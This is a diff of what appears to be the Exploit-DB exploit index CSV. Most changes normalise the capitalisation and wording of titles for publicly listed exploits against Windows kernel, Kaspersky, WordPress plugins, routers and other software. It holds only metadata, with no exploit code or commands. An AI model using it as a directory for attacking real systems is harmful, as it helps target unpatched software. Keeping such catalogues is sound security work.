+38266,platforms/win_x86/dos/38266.txt,"Microsoft Windows - Kernel DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38267,platforms/win_x86/dos/38267.txt,"Microsoft Windows - Kernel UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38268,platforms/win_x86/dos/38268.txt,"Microsoft Windows - Kernel Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38269,platforms/win_x86/dos/38269.txt,"Microsoft Windows - Kernel HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38270,platforms/win_x86/dos/38270.txt,"Microsoft Windows - Kernel win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38271,platforms/win_x86/dos/38271.txt,"Microsoft Windows - Kernel SURFOBJ NULL Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38272,platforms/windows/dos/38272.txt,"Microsoft Windows - Kernel Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 +38273,platforms/win_x86/dos/38273.txt,"Microsoft Windows - Kernel WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38274,platforms/win_x86/dos/38274.txt,"Microsoft Windows - Kernel NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38275,platforms/win_x86/dos/38275.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38276,platforms/win_x86/dos/38276.txt,"Microsoft Windows - Kernel FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38277,platforms/win_x86/dos/38277.txt,"Microsoft Windows - Kernel bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38278,platforms/win_x86/dos/38278.txt,"Microsoft Windows - Kernel Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38279,platforms/win_x86/dos/38279.txt,"Microsoft Windows - Kernel Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38280,platforms/win_x86/dos/38280.txt,"Microsoft Windows - Kernel NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 +38281,platforms/windows/dos/38281.txt,"Kaspersky AntiVirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38282,platforms/windows/dos/38282.txt,"Kaspersky AntiVirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38283,platforms/windows/dos/38283.txt,"Kaspersky AntiVirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38284,platforms/windows/dos/38284.txt,"Kaspersky AntiVirus - '.DEX' File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38285,platforms/windows/dos/38285.txt,"Kaspersky AntiVirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 +38286,platforms/windows/dos/38286.txt,"Kaspersky AntiVirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38287,platforms/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 +38288,platforms/windows/dos/38288.txt,"Kaspersky AntiVirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 -38290,platforms/php/webapps/38290.txt,"Wordpress flashnews Theme - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 +38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme - Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP - 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38296,platforms/php/webapps/38296.txt,"Wordpress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 -38297,platforms/php/webapps/38297.txt,"Wordpress Wysija Newsletters Plugin - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 +38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 +38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin - Multiple SQL Injections",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 -38300,platforms/php/webapps/38300.txt,"Wordpress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 -38301,platforms/php/webapps/38301.txt,"Wordpress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 +38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 +38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 -38307,platforms/win_x86/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 +38307,platforms/win_x86/dos/38307.txt,"Microsoft Windows - Kernel NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 38308,platforms/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38310,platforms/android/remote/38310.c,"Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 -38314,platforms/php/webapps/38314.txt,"Wordpress NextGEN Gallery Plugin - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 +38314,platforms/php/webapps/38314.txt,"WordPress NextGEN Gallery Plugin - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0 -38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0 +38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - '.qfl' Crash (PoC)",2015-09-25,Un_N0n,windows,dos,0 38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP - Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 38320,platforms/php/webapps/38320.txt,"Squirrelcart - 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - Cross-Site Request Forgery",2015-09-25,Portcullis,php,webapps,80 38322,platforms/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 -38324,platforms/php/webapps/38324.txt,"Wordpress Pretty Link Plugin - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 +38324,platforms/php/webapps/38324.txt,"WordPress Pretty Link Plugin - Cross-Site Scripting",2013-02-20,hiphop,php,webapps,0 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote,0 38326,platforms/php/webapps/38326.txt,"ZenPhoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 -38331,platforms/php/webapps/38331.txt,"Wordpress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 +38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 38332,platforms/php/webapps/38332.txt,"Batavi - 'index.php' Cross-Site Scripting",2013-03-01,Dognaedis,php,webapps,0 38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0 38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0 @@ -34632,7 +34635,7 @@ id,file,description,date,author,platform,type,port 38341,platforms/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 -38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 +38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader - AFParseDate JavaScript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 38346,platforms/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 38347,platforms/bsd/local/38347.rb,"Watchguard XCS - FixCorruptMail Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 @@ -34643,11 +34646,11 @@ id,file,description,date,author,platform,type,port 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 -38355,platforms/php/webapps/38355.txt,"Wordpress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 +38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 38356,platforms/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38357,platforms/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center - 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 -38359,platforms/php/webapps/38359.txt,"Wordpress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 +38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel - Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 @@ -34660,19 +34663,19 @@ id,file,description,date,author,platform,type,port 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote,0 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 - Web Interface XML Injection",2015-10-01,neom22,hardware,webapps,0 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0 -38371,platforms/osx/local/38371.py,"Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 +38371,platforms/osx/local/38371.py,"Apple Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0 38372,platforms/php/webapps/38372.html,"Question2Answer - Cross-Site Request Forgery",2013-03-01,MustLive,php,webapps,0 -38373,platforms/php/webapps/38373.txt,"Wordpress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 -38374,platforms/php/webapps/38374.txt,"SWFUpload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 +38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id - HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 +38374,platforms/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 -38376,platforms/php/webapps/38376.txt,"Wordpress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 +38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,windows,webapps,0 38381,platforms/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local,0 -38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - .asx Stack Overflow",2015-10-02,ex_ptr,windows,local,0 +38382,platforms/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Stack Overflow",2015-10-02,ex_ptr,windows,local,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 -38384,platforms/windows/remote/38384.txt,"Avast Antivirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 +38384,platforms/windows/remote/38384.txt,"Avast AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote,0 38385,platforms/php/webapps/38385.txt,"KindEditor - Multiple Remote File Upload Vulnerabilities",2013-03-11,KedAns-Dz,php,webapps,0 38386,platforms/php/webapps/38386.txt,"PHPBoost - Arbitrary File Upload / Information Disclosure",2013-03-11,KedAns-Dz,php,webapps,0 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 @@ -34681,26 +34684,26 @@ id,file,description,date,author,platform,type,port 38390,platforms/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local,0 38391,platforms/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,php,webapps,0 38392,platforms/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial Of Service",2013-03-07,"Alyssa Milburn",linux,dos,0 -38393,platforms/php/webapps/38393.html,"Wordpress Occasions Plugin - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 +38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote,0 -38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 -38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 -38537,platforms/php/webapps/38537.txt,"Wordpress ADIF Log Search Widget Plugin - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0 +38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus 9.1 build 9110 - Directory Traversal",2015-10-05,xistence,jsp,webapps,8080 +38536,platforms/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Parameter Open redirection",2013-05-27,"Chokri Ben Achor",hardware,remote,0 +38537,platforms/php/webapps/38537.txt,"WordPress ADIF Log Search Widget Plugin - 'logbook_search.php' Cross-Site Scripting",2013-05-27,k3170makan,php,webapps,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 -38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 -38403,platforms/win_x86/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 +38400,platforms/php/webapps/38400.txt,"Alienvault OSSIM 4.3 - Cross-Site Request Forgery",2015-10-05,"MohamadReza Mohajerani",php,webapps,0 +38403,platforms/win_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 -38410,platforms/php/webapps/38410.txt,"Wordpress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 +38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 -38414,platforms/php/webapps/38414.txt,"Wordpress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 -38415,platforms/asp/webapps/38415.txt,"C2 WebResource - ' File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 +38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 +38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 @@ -34724,24 +34727,24 @@ id,file,description,date,author,platform,type,port 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 -38439,platforms/php/webapps/38439.txt,"Wordpress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 -38440,platforms/php/webapps/38440.txt,"PHPMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 -38441,platforms/php/webapps/38441.txt,"Wordpress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 +38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 +38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 +38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 -38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 +38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 -38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 +38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 -38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0 +38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution",2015-10-14,blasty,multiple,remote,0 38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 -38458,platforms/php/webapps/38458.txt,"Wordpress Spider Video Player Plugin - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 +38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 @@ -34750,79 +34753,79 @@ id,file,description,date,author,platform,type,port 38462,platforms/java/webapps/38462.txt,"Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 